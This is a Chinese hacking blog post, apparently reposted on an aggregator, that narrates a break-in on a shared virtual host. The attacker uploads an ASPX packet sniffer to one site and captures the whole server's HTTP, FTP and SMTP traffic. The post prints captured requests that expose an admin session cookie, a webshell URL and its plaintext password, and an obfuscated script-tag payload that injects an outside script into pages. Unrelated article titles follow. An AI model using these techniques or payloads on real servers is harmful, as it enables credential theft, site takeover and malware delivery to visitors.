WinSock嗅探虚拟主机拿站取webshell
来源:互联网 发布:女生袜子知乎 编辑:程序博客网 时间:2024/05/01 14:43
感觉这些够无聊的,没点新意不说,好像还觉得有点白痴 - - 所以文章我本来就没打算写。不过既然有人帮我写了,我就发出来吧。其实我拿到虚拟主机管理员密码的步骤是。。。。。。
PS:这工具过几天在本文里放出呵。因为最近考试,博客七月前不更新了,七月放假了我在回来完善博客程序
过程是我搞的,但是当时我没截图,所以小酷同学整理出来的这个文章时间就有点对不上,不过确实是这么个步骤
首先是嗅探工具,asp的虚拟一般都支持aspx(少数不支持的忽略哈),那么用C#调用winsock嗅探下80端口、顺便连ftp和SMTP端口一起监听了吧。
第一步,随便旁注拿下asp虚拟主机上的一个网站,上传aspx的工具(工具我会随后发上来的)如图:
这个虚拟主机还算不错,才三分钟,就Packets: 260这么多包了
一个通宵抓包,好了,该分析日志了。
日志下载下来,因为虚拟主机,监听的是整个服务器,信息量太大,只能有选择的分析,搜索admin、pass、user、login等等有选择的看包。
从抓包中发现,很多人在暴力猜解ftp密码。。。晕,这是何苦呢
搜索admin这一关键词时有这么一个部分引起了我的注意,如图:
目录是admin下的文件,而且还有Cookie。。。很明显。呵呵
再看往下:
POST: /Admin/sent.asp HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.xxx.com/Admin/sent.asp
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.xxx.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 13
pass=buqiuren
慢慢来看,无关的跳过了哈
POST: /Admin/sent.asp
发送指令到admin目录的sent.asp
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
这个不用解释了吧,用session,session似乎不能像Cookie那样欺骗,能我也不会
Referer: http://www.xxx.com/Admin/sent.asp
完整的url估计就是这个不错了,打开看看。居然是webshell
这下就更省事了
好了,继续往下看:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
反正不是我机器上的
下面的越看越无聊,直接跳到最后:
pass=buqiuren
输入密码:buqiuren即可登录
下面就是批量清马,清理找webshell了
PS:做人要积德,挂马盗号这样的无德无良的事情最好不要干,修复漏洞,留张条就行了。罪过啊罪过
look,挂马的信息也抓出来了。。。。好无聊
POST /Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script> HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.xxx.com/Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.xxx.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 153
- WinSock嗅探虚拟主机拿站取webshell
- 虚拟主机封杀webshell提权
- 虚拟主机封杀WebShell提权!
- 博客文章: Nginx虚拟主机防webshell
- nginx虚拟主机防webshell 完美版
- 使用webshell突破虚拟主机权限设置的一般思路
- 使用webshell突破虚拟主机权限设置的一般思路
- 旁注虚拟主机IIS权限重分配跨目录得webshell
- webshell
- webshell
- WebShell
- WebShell
- webshell
- webshell
- webshell
- webshell
- WEBSHELL
- webshell
- Spring学习 8
- Spring学习 9
- 年终大学习之MySQL数据库优化学习笔记(五)
- 2 Linear Regression, Gradient descent
- 语义化版本2.0.0
- WinSock嗅探虚拟主机拿站取webshell
- 第一周工作总结及计划表
- 如何打造不怕被嗅探的3389登陆
- 冬令营第七天
- 【BZOJ 1064】 [Noi2008]假面舞会
- Silverlight跨域访问安全性问题
- 阳光在线|www.ks6899.com|阳光代理充值开户官方网
- 浅谈我对机器学习的理解
- web开发者资源